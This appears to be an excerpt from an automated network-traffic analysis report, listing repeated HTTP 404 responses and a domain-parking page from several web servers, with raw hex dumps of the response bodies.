Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:24 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:27 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:09 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:15 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:48:20.7715590Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:18 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:48:23.0765341Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:31 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:34 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:36 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:39 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
